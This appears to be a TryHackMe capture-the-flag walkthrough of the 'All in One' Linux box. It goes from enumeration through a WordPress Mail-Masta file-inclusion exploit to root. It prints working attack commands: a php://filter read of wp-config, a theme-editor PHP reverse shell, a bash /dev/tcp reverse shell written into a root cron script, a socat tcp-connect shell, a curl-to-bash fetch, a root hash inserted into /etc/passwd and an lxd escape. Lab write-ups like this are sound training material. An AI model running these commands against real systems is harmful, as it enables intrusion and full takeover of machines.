All in One is an easy Linux box on TryHackMe.
Enumeration
Starting off with an nmap scan, I find port 21, 22 and 80 open
root@kali:~/tryhackme/allinone# nmap -sC -sV 10.10.166.147 Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining) Nmap scan report for 10.10.166.147 Host is up (0.22s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.2.8.75 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA) | 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA) |_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds |
FTP Enumeration
Since FTP is allowing anonymous access, I login and start to poke around
root@kali:~/tryhackme/allinone# ftp 10.10.166.147 Connected to 10.10.166.147. 220 (vsFTPd 3.0.3) Name (10.10.166.147:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir -a 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 06 11:57 . drwxr-xr-x 2 0 115 4096 Oct 06 11:57 .. 226 Directory send OK. |
Nothing is located here, so I try to upload files, however I am not allowed to do that
ftp> put new local: new remote: new 200 PORT command successful. Consider using PASV. 553 Could not create file. |
Moving onto to port 80, I run gobuster to look for any directories. Here I find /wordpress
HTTP Enumeration
root@kali:~/tryhackme/allinone# gobuster dir -u 10.10.166.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.166.147 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: html [+] Timeout: 10s =============================================================== 2020/12/09 15:39:33 Starting gobuster =============================================================== /index.html (Status: 200) /wordpress (Status: 301) |
Since /wordpress
is open, I can run wpscan to gather more information
root@kali:~/tryhackme/allinone# wpscan --url 10.10.166.147/wordpress _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.6 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]N [+] URL: http://10.10.166.147/wordpress/ [+] Started: Wed Dec 9 16:54:36 2020 Interesting Finding(s): [+] http://10.10.166.147/wordpress/ | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://10.10.166.147/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.166.147/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://10.10.166.147/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://10.10.166.147/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01). | Found By: Rss Generator (Passive Detection) | - http://10.10.166.147/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator> | - http://10.10.166.147/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator> [+] WordPress theme in use: twentytwenty | Location: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/ | Latest Version: 1.5 (up to date) | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/readme.txt | Style URL: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.5 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] mail-masta | Location: http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/ | Latest Version: 1.0 (up to date) | Last Updated: 2014-09-19T07:52:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.0 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt [+] reflex-gallery | Location: http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/ | Latest Version: 3.1.7 (up to date) | Last Updated: 2019-05-10T16:05:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 3.1.7 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/readme.txt [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:01 <====================================================================================================================================> (21 / 21) 100.00% Time: 00:00:01 [i] No Config Backups Found. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Wed Dec 9 16:54:52 2020 |
Exploit
Mail-Masta Exploit
Since wpscan found a few plugins, I start looking for exploits for them. Looking at mail-masta, I find one on exploit-db
Looking through this exploit, I find that that /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
is a working exploit as I can view the file
Since this is working properly, I need to find a file to read that will give me useful information. I find a medium article detailing on how to extract the wp-config file by converting it to base64 first. To do this, I just need to edit the link to /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
This outputs a large base64 value. I take this value and put it in a file named wp-config. I then decrypt it to properly read the file
root@kali:~/tryhackme/allinone# cat wp-config | base64 -d ....................................................... /** MySQL database username */ define( 'DB_USER', 'elyana' ); /** MySQL database password */ define( 'DB_PASSWORD', '*******************' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); ....................................................... |
WordPress Reverse Shell
With this password, I can login to the wordpress website using this password. Once logged in, I navigate to Appearance > Theme Editor. I then select 404 Template (404.php)
and replace the contents with a php reverse shell. If you wish to read up more on how to gain a reverse shell on wordpress, I recommend checking out this article by Hacking Articles
Once I finish editing this file, I save it and set up a netcat listener. Once my listener is running, I navigate to /wp-content/themes/twentytwenty/404.php
to gain a reverse shell
root@kali:~/tryhackme/allinone# nc -lvnp 1234 listening on [any] 1234 ... connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 59480 Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 22:59:22 up 2:21, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ |
Privilege Escalation as www-data
Before running any scans, I want to import python3 into the shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")' bash-4.4$ ^Z [1]+ Stopped nc -lvnp 1234 root@kali:~/tryhackme/allinone# stty raw -echo root@kali:~/tryhackme/allinone# fg bash-4.4$ |
I then run LinEnum.sh and find several ways to escalate my privileges straight to root
bash-4.4$ curl 10.2.8.75/LinEnum.sh | bash |
SUID
Looking at the SUID section of LinEnum, it immediately points out 3 known vulnerable SUID files. I will be using gtfobins to exploit these
Starting off with bash, I can use look on gtfobins to find the correct syntax to exploit it with bash
bash-4.4$ bash -p bash-4.4# |
Looking at chmod on gtfobins, I find that it will not drop me a shell, but allow me to edit the permissions on any file. You can edit the root.txt and user.txt file to be able to read them, but I want to gain root access. I instead change the /etc/passwd file so I can insert my own password.
bash-4.4# chmod 0777 /etc/passwd bash-4.4# ls -la /etc/passwd -rwxrwxrwx 1 root root 1672 Oct 6 11:57 /etc/passwd |
I need to generate a password using openssl to insert into the /etc/passwd file
root@kali:~/tryhackme/allinone# openssl passwd -1 -salt root password $1$root$1fvaXuILgb4rdRlHdQ80N/ |
Now edit the file and replace the x
next to root with the new hash
bash-4.4$ vi /etc/passwd root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash |
After saving this, we can login to root with the password of password
bash-4.4$ su root Password: root@elyana:/# |
Cronjob
Looking at the cronjobs, I find that root is running one out of /var/backups/script.sh
Navigating there, I see I am allowed to edit the file
bash-4.4$ ls -la total 52 drwxr-xr-x 2 root root 4096 Oct 7 13:41 . drwxr-xr-x 14 root root 4096 Oct 5 19:43 .. -rw-r--r-- 1 root root 32890 Oct 6 11:57 apt.extended_states.0 -rw-r--r-- 1 root root 3570 Oct 5 21:07 apt.extended_states.1.gz -rwxrwxrwx 1 root root 73 Oct 7 13:37 script.sh |
Since I am allowed to edit the file, I insert a bash reverse shell from Pentest Monkey
echo ‘#!/bin/bash’ > script.sh
echo ‘bash -i >& /dev/tcp/10.9.2.255/9002 0>&1’ >> script.sh
With this edited, I set up a netcat listener and wait for a few moments. I then recieve a connection and a root shell
root@kali:~/tryhackme/allinone# nc -lvnp 9002 listening on [any] 9002 ... connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 58036 bash: cannot set terminal process group (19460): Inappropriate ioctl for device bash: no job control in this shell root@elyana:~# |
Elevating to elyana
Moving backwards, I will work as www-data and try to elevate to elyana.
Reading the hint.txt file on elyana desktop I find that the password for this user is stored somewhere
bash-4.4$ cat hint.txt Elyana's user password is hidden in the system. Find it ;) |
I start looking around for anything that is useful. Under /etc/
I find an interesting result
This looks promissing, so I read the file and find credentials.
bash-4.4$ cat /etc/mysql/conf.d/private.txt user: elyana password: ********* |
Another way of finding this file is running linpeas
Testing this password, I can login to elyana
bash-4.4$ su elyana Password: bash-4.4$ whoami elyana |
Privilege Escalation as elyana
Like www-data, there are several ways to elevate to root as elyana. I will outline a few methods here. I rerun LinEnum.sh to help find results
Sudo
The first thing I do is run sudo -l
to see if I am allowed to run any commands as sudo. Here, I find I can run socat
bash-4.4$ sudo -l Matching Defaults entries for elyana on elyana: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User elyana may run the following commands on elyana: (ALL) NOPASSWD: /usr/bin/socat |
Looking on gtfobins I see an easy way to escalte to root. Running this command gives me root access
bash-4.4$ sudo socat stdin exec:/bin/sh whoami root |
or use ( and cath with a netcat listener)
sudo socat tcp-connect:10.9.2.255:9001 exec:bash,pty,stderr,setsid,sigint,sane
lxd
Looking at LinEnum I find that we are a member of the lxd group
This is a popular exploit and I will be following this guide to do so.
First, I download the alpine builder and build it on my local machine.
root@kali:~/tryhackme/allinone# git clone https://github.com/saghul/lxd-alpine-builder.git Cloning into 'lxd-alpine-builder'... remote: Enumerating objects: 4, done. remote: Counting objects: 100% (4/4), done. remote: Compressing objects: 100% (4/4), done. remote: Total 31 (delta 0), reused 0 (delta 0), pack-reused 27 Unpacking objects: 100% (31/31), done. root@kali:~/tryhackme/allinone# cd lxd-alpine-builder/ root@kali:~/tryhackme/allinone/lxd-alpine-builder# ./build-alpine Determining the latest release... v3.12 .................................................................................. OK: 8 MiB in 19 packages |
Once this is done building, I upload it to the machine and import it
bash-4.4$ wget 10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz --2020-12-10 02:23:07-- http://10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz Connecting to 10.2.8.75:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3199386 (3.1M) [application/gzip] Saving to: ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’ alpine-v3.12-x86_64 100%[===================>] 3.05M 321KB/s in 16s 2020-12-10 02:23:24 (190 KB/s) - ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’ saved [3199386/3199386] lxc image import ./alpine-v3.12-x86_64-20201209_2120.tar.gz --alias myimage |
I want to double check it has been created properly
bash-4.4$ lxc image list +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE | +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | myimage | fa664dd4e321 | no | alpine v3.12 (20201209_21:20) | x86_64 | 3.05MB | Dec 10, 2020 at 2:23am (UTC) | +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ |
The image was created properly, so I can now start this and execute it to gain root access
bash-4.4$ lxc init myimage ignite -c security.privileged=true Creating ignite bash~4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to ignite bash-4.4$ lxc start ignite bash-4.4$ lxc exec ignite /bin/sh ~ # whoami root |
Finally the user.txt and root.txt are encoded using base64, go ahead decode them, and submit your flags 🚩🚩!
This was a fun box to be honest and it contains some of the most important ways into exploiting a system.